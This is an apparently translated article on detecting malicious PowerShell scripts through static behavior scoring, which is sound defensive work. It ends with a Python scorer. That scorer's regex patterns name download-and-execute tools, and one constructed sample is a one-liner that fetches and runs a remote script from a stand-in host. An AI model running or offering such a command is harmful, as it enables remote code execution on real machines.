
What are the common confusing ways to hide data in powershell scripts

2025-02-24 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

This article explains in detail the common obfuscation methods used to hide data in PowerShell scripts. The editor considers it very practical and shares it here as a reference; I hope you get something out of reading it.

Defining behavior in PowerShell

Before discussing design and concepts, we need to define what "behavior" means in this context. PowerShell is a Microsoft scripting language, and it can also interpret and execute native Windows command-line programs and .NET code. For example, the following three lines in a PowerShell script produce the same output, even though they are three different ways of calling it.

Get-Date                  # PowerShell cmdlet
date                      # Command-line native Windows application
[System.DateTime]::Now    # .NET

This flexibility makes analysis harder, because we have to account for multiple ways of expressing the same thing.

A behavior is not necessarily tied to a single command or to one variant of a command. For example, the Get-Date cmdlet might count as "enumeration" behavior, because it retrieves data about the host system running the script. Similarly, the .NET call "New-Object System.Net.WebClient" followed by ".DownloadFile" can be grouped under "downloader" behavior, because it is used to retrieve files remotely.

Dynamic and static analysis

Script behaviors need to be clearly identified, but identification alone is sometimes not enough to decide whether a script is benign or malicious. How those behaviors are used is the deciding factor. So how do we infer intent? Consider two examples that look similar on the surface and exhibit the same behaviors: "downloader", "sleeps", "enumeration" and "one liner".

Before dynamic malware analysis came into view, static inspection of files was the main way to decide whether a sample was malicious. Over time, as dynamic analysis matured, more of the industry shifted its tooling, products and defensive response strategies toward the dynamic rather than static properties of malicious files. Dynamic analysis yields a great deal of information while greatly reducing the resources, skill and time invested, so behavior analysis became the dominant approach.

If a PowerShell script downloads and executes another script, enumerates system information, and uses compression and a lot of base64, an analyst's first thought may be that it is malicious, because these are everyday behaviors seen when dynamically analyzing malware. But in the example below, it is just a PowerShell script that displays an animation.

Determining intent

To determine intent, you need to establish a "ground truth" and grade scripts against it. This means manually analyzing thousands of real-world benign and malicious PowerShell scripts and labelling each as benign or malicious. When a known malicious script scores below the chosen threshold, you focus on improving accuracy for the remaining samples. The manual classification process covered every kind of script imaginable, including a wide range of administrative and bootstrap scripts.

Once the sample set is classified, the question of intent can be answered more completely. As you examine a script and begin analyzing its behaviors, you also need to consider the weight of each behavior and its relationship to the overall intent of the script.

For example, a script that only downloads and executes an executable is less likely to be malicious when it also writes logs or when its code is well structured, compared with a script that behaves the same way but uses obfuscation and is packed entirely onto one line. Similarly, once a behavior is identified, its distribution across benign and malicious scripts can be observed. You should also watch for "rare" behaviors in a script and adjust the score weights accordingly.

Identifying the important behaviors and working out how to score them properly is the heart of this analysis. Once the behaviors are defined and scores assigned, we can build a risk scale onto which each sample is mapped, find a "sweet spot" and begin finer adjustments. The following chart describes the criteria levels used for static risk scoring of PowerShell scripts.

The score for malicious scripts is set at around 6.0; below this threshold the risk is lower.

Things to consider

Finally, the following points need to be considered:

PowerShell is a very flexible language. It offers many ways to invoke the same functionality, and in the end not everything can be captured statically, especially if a malicious script author is trying to evade detection. Sometimes a behavior indicator is missed; in those cases the policy errs on the side of caution, letting such malicious scripts score below the threshold rather than over-weighting certain behaviors and pushing benign scripts too high.

Another pattern seen during analysis is that benign scripts are usually self-contained: they can run without parameters or dependencies. Malicious scripts are usually a small part of a larger puzzle and occupy only a small piece of it.

Whatever the size of the behavior being modelled, when a function-based behavior fails to match, you can still use contextual keywords (such as "invoke dllinjection") or metadata (such as character frequency analysis) as the behavior model and let them influence the score.

Hidden behavior also needs to be considered. If you can clearly see a malicious URL in the script but cannot identify how the payload is downloaded from it, you can still infer that the script has an unknown download behavior. These inferred behaviors are a good basis for further searching and analysis.
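As an added example (not code from the original article or the research it summarises), a small Python scorer that applies the ideas above: equivalent spellings of one action collapse to a single behavior label, weighted behaviors sum to a score that is compared with the 6.0 threshold, structured scripts that log are weighted down, and a visible URL with no recognised download verb is recorded as an inferred "unknown download". The patterns, weights and sample scripts are assumed and constructed for illustration.

```python
import re

# Constructed behavior catalogue (assumed for this example; the article gives no rule set).
# Each entry maps several equivalent PowerShell spellings of one action onto one label
# and a score weight.
BEHAVIORS = {
    "enumeration": (r"Get-Date|\bdate\b|\[System\.DateTime\]::Now|Get-ComputerInfo|\$env:", 1.0),
    "downloader":  (r"Net\.WebClient|DownloadFile|DownloadString|Invoke-WebRequest", 2.5),
    "execution":   (r"\bIEX\b|Invoke-Expression", 2.0),
    "sleeps":      (r"Start-Sleep|\[System\.Threading\.Thread\]::Sleep", 0.5),
    "base64":      (r"FromBase64String|-EncodedCommand", 2.0),
    "compression": (r"GzipStream|DeflateStream", 1.5),
}
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
LOG_RE = re.compile(r"Write-Verbose|Write-Log|Write-Host", re.I)
THRESHOLD = 6.0  # the article's rough cut-off for a malicious script

def analyze(script: str) -> dict:
    """Statically score one script: matched behaviors, inferred behaviors, risk."""
    found = {name for name, (rx, _) in BEHAVIORS.items() if re.search(rx, script, re.I)}
    score = sum(BEHAVIORS[n][1] for n in found)
    inferred = set()
    code = [l for l in script.splitlines() if l.strip() and not l.lstrip().startswith("#")]
    # A long single line of code is the "one liner" trait the article treats as rare.
    if len(code) == 1 and len(code[0]) > 80:
        found.add("one liner")
        score += 1.5
    # A visible URL with no recognised download verb still implies an unknown
    # download path; record it as inferred rather than matched.
    if URL_RE.search(script) and "downloader" not in found:
        inferred.add("unknown download")
        score += 1.5
    # Well-structured scripts that log are weighted down, as the article suggests.
    if len(code) > 1 and LOG_RE.search(script):
        score -= 1.0
    score = round(max(score, 0.0), 1)
    return {"behaviors": sorted(found), "inferred": sorted(inferred),
            "score": score, "malicious": score >= THRESHOLD}

# Constructed samples (not real malware); host names use the reserved .invalid TLD.
BENIGN = """# inventory (constructed)
$stamp = Get-Date
$info = Get-ComputerInfo
Write-Verbose "collected at $stamp"
$info | Export-Csv C:\\inventory\\report.csv
"""
ONE_LINER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x.ps1'); Start-Sleep 30"
HIDDEN = "$u = 'http://example.invalid/p'\n& $args[0] $u | Out-File $env:TEMP\\o.txt\n"

if __name__ == "__main__":
    for name, s in [("benign", BENIGN), ("one_liner", ONE_LINER), ("hidden", HIDDEN)]:
        print(name, analyze(s))
```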

This concludes the article on "What are the common obfuscation methods for hiding data in PowerShell scripts?" I hope the above content has been of some help and that you have learned something from it. If you found the article useful, please share it so more people can see it.
